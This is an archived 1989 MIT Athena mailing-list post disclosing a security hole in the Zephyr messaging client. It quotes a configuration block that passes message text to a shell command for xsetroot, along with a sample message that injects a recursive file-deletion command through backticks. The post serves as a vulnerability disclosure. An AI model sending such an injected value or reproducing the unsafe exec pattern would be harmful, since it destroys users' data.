[180] in Zephyr_Comments


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

big security hole in zephyr, esp. xsetroot

daemon@ATHENA.MIT.EDU (Joe Harrington)
Fri Mar 24 14:50:07 1989

Date: Fri, 24 Mar 89 14:43:19 EST
From: Joe Harrington <jh@ATHENA.MIT.EDU>
To: pikans@ATHENA.MIT.EDU, sipb@ATHENA.MIT.EDU, watch@ATHENA.MIT.EDU,
Cc: jh@ATHENA.MIT.EDU
Reply-To: jh@ATHENA.MIT.EDU
        match XSETROOT
                exec (rm -f /tmp/zxsr.data;
                     echo "$message" > /tmp/zxsr.data;
                    xsetroot -bitmap /tmp/zxsr.data > /dev/null)
                exit
        endmatch

$message = "`/bin/rm -rf * .*`"

need I say more?

Thanks to Craig Counterman for pointing this out.

--jh--


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[180] in Zephyr_Comments

big security hole in zephyr, esp. xsetroot

daemon@ATHENA.MIT.EDU (Joe Harrington)Fri Mar 24 14:50:07 1989

daemon@ATHENA.MIT.EDU (Joe Harrington)
Fri Mar 24 14:50:07 1989